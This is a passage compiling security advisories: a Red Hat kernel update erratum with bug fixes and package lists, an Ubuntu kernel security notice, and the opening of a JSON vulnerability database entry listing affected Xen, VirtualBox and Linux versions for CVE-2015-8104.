Red Hat would like to thank the Perception Point research team for reporting the CVE-2016-0728 issue. The security impact of the CVE-2016-0774 issue was discovered by Red Hat.

Bug fixes:

  • NMI watchdog of guests using legacy LVT0-based NMI delivery did not work with APICv. Now, NMI works with LVT0 regardless of APICv. (BZ#1244726)

  • Parallel file-extending direct I/O writes could previously race to update the size of the file. If they executed out-of-order, the file size could move backwards and push a previously completed write beyond the end of the file, causing it to be lost. (BZ#1258942)

  • The GHES NMI handler had a global spin lock that significantly increased the latency of each perf sample collection. This update simplifies locking inside the handler. (BZ#1280200)

  • Sometimes, iptables rules are updated along with ip rules, and routes are reloaded. Previously, skb->sk was mistakenly attached to some IPv6 forwarding traffic packets, which could cause kernel panic. Now, such packets are checked and not processed. (BZ#1281700)

  • The NUMA node was not reported for PCI adapters, which affected every POWER system deployed with Red Hat Enterprise Linux 7 and caused significant decrease in the system performance. (BZ#1283525)

  • Processing packets with a lot of different IPv6 source addresses caused the kernel to return warnings concerning soft-lockups due to high lock contention and latency increase. (BZ#1285369)

  • Running edge triggered interrupts with an ack notifier when simultaneously reconfiguring the Intel I/O IOAPIC did not work correctly, so EOI in the interrupt did not cause a VM to exit if APICv was enabled. Consequently, the VM sometimes became unresponsive. (BZ#1287001)

  • Block device readahead was artificially limited, so the read performance was poor, especially on RAID devices. Now, per-device readahead limits are used for each device, which has improved read performance. (BZ#1287548)

  • Identical expectations could not be tracked simultaneously even if they resided in different connection tracking zones. Now, an expectation insert attempt is rejected only if the zone is also identical. (BZ#1290093)

  • The storvsc kernel driver for Microsoft Hyper-V storage was setting incorrect SRB flags, and Red Hat Enterprise Linux 7 guests running on Microsoft Hyper-V were experiencing slow I/O as well as I/O failures when they were connected to a virtual SAN. Now, SRB flags are set correctly. (BZ#1290095)

  • When a NUMA system with no memory in node 0 was used, the system terminated unexpectedly during boot or when using OpenVSwitch. Now, the kernel tries to allocate memory from other nodes when node 0 is not present. (BZ#1300950)

Enhancement:

  • IPsec has been updated to provide many fixes and some enhancements. Of particular note is the ability to match on outgoing interfaces. (BZ#1287407)

  • Solution:

All kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add this enhancement. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

1278496 - CVE-2015-8104 virt: guest to host DoS by triggering an infinite loop in microcode via #DB exception 1297475 - CVE-2016-0728 kernel: Possible use-after-free vulnerability in keyring facility 1303961 - CVE-2016-0774 kernel: pipe buffer state corruption after unsuccessful atomic read from pipe

  1. Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.1):

Source: kernel-3.10.0-229.26.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-229.26.2.el7.noarch.rpm kernel-doc-3.10.0-229.26.2.el7.noarch.rpm

x86_64: kernel-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm kernel-devel-3.10.0-229.26.2.el7.x86_64.rpm kernel-headers-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-229.26.2.el7.x86_64.rpm perf-3.10.0-229.26.2.el7.x86_64.rpm perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1):

x86_64: kernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-229.26.2.el7.x86_64.rpm perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm python-perf-3.10.0-229.26.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.1):

Source: kernel-3.10.0-229.26.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-229.26.2.el7.noarch.rpm kernel-doc-3.10.0-229.26.2.el7.noarch.rpm

ppc64: kernel-3.10.0-229.26.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-229.26.2.el7.ppc64.rpm kernel-debug-3.10.0-229.26.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-229.26.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-229.26.2.el7.ppc64.rpm kernel-devel-3.10.0-229.26.2.el7.ppc64.rpm kernel-headers-3.10.0-229.26.2.el7.ppc64.rpm kernel-tools-3.10.0-229.26.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-229.26.2.el7.ppc64.rpm perf-3.10.0-229.26.2.el7.ppc64.rpm perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm

s390x: kernel-3.10.0-229.26.2.el7.s390x.rpm kernel-debug-3.10.0-229.26.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-229.26.2.el7.s390x.rpm kernel-debug-devel-3.10.0-229.26.2.el7.s390x.rpm kernel-debuginfo-3.10.0-229.26.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-229.26.2.el7.s390x.rpm kernel-devel-3.10.0-229.26.2.el7.s390x.rpm kernel-headers-3.10.0-229.26.2.el7.s390x.rpm kernel-kdump-3.10.0-229.26.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-229.26.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-229.26.2.el7.s390x.rpm perf-3.10.0-229.26.2.el7.s390x.rpm perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm

x86_64: kernel-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm kernel-devel-3.10.0-229.26.2.el7.x86_64.rpm kernel-headers-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-229.26.2.el7.x86_64.rpm perf-3.10.0-229.26.2.el7.x86_64.rpm perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.1):

Source: kernel-3.10.0-229.26.2.ael7b.src.rpm

noarch: kernel-abi-whitelists-3.10.0-229.26.2.ael7b.noarch.rpm kernel-doc-3.10.0-229.26.2.ael7b.noarch.rpm

ppc64le: kernel-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-bootwrapper-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debug-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debug-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-headers-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-tools-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-tools-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-tools-libs-3.10.0-229.26.2.ael7b.ppc64le.rpm perf-3.10.0-229.26.2.ael7b.ppc64le.rpm perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm python-perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.1):

ppc64: kernel-debug-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-229.26.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-229.26.2.el7.ppc64.rpm perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm python-perf-3.10.0-229.26.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm

s390x: kernel-debug-debuginfo-3.10.0-229.26.2.el7.s390x.rpm kernel-debuginfo-3.10.0-229.26.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-229.26.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-229.26.2.el7.s390x.rpm perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm python-perf-3.10.0-229.26.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm

x86_64: kernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-229.26.2.el7.x86_64.rpm perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm python-perf-3.10.0-229.26.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.1):

ppc64le: kernel-debug-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debug-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-tools-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm kernel-tools-libs-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm python-perf-3.10.0-229.26.2.ael7b.ppc64le.rpm python-perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2015-8104 https://access.redhat.com/security/cve/CVE-2016-0728 https://access.redhat.com/security/cve/CVE-2016-0774 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFWsRgRXlSAg2UNWIIRAsuoAJ9mnI1BiwR8EIbz4ftpTIHLgMb7uACgupNa ZLhiq2N2Uby2QzMRLTMeMXM= =H7xL -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Content-Disposition: inline

============================================================================ Ubuntu Security Notice USN-2843-2 December 17, 2015

linux-lts-wily vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-wily: Linux hardware enablement kernel from Wily

Details:

Jan Beulich discovered that the KVM svm hypervisor implementation in the Linux kernel did not properly catch Debug exceptions on AMD processors. (CVE-2015-8104)

=E9=83=AD=E6=B0=B8=E5=88=9A discovered that the ppp implementation in the Linux kernel did not ensure that certain slot numbers are valid. (CVE-2015-7872)

It was discovered that the virtual video osd test driver in the Linux kernel did not properly initialize data structures. (CVE-2015-7884)

It was discovered that the driver for Digi Neo and ClassicBoard devices did not properly initialize data structures. (CVE-2015-7885)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: linux-image-4.2.0-21-generic 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-generic-lpae 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-lowlatency 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-powerpc-e500mc 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-powerpc-smp 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-powerpc64-emb 4.2.0-21.25~14.04.1 linux-image-4.2.0-21-powerpc64-smp 4.2.0-21.25~14.04.1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201511-0101",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.3.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.4.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.3.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.4.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.5.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.4.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.35"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.2.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.04"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.1.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.2.34"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.5.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.4.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.5.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.5"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.0"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.2.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "xen",
        "version": "4.3.x to  4.6.x"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "4.0.36"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "4.1.44"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "4.2.36"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "4.3.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.16"
      },
      {
        "model": "xenserver service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.36"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.20"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space 15.1f2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.8"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "enterprise linux server eus 6.6.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "80"
      },
      {
        "model": "junos space 15.1r2.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.14"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
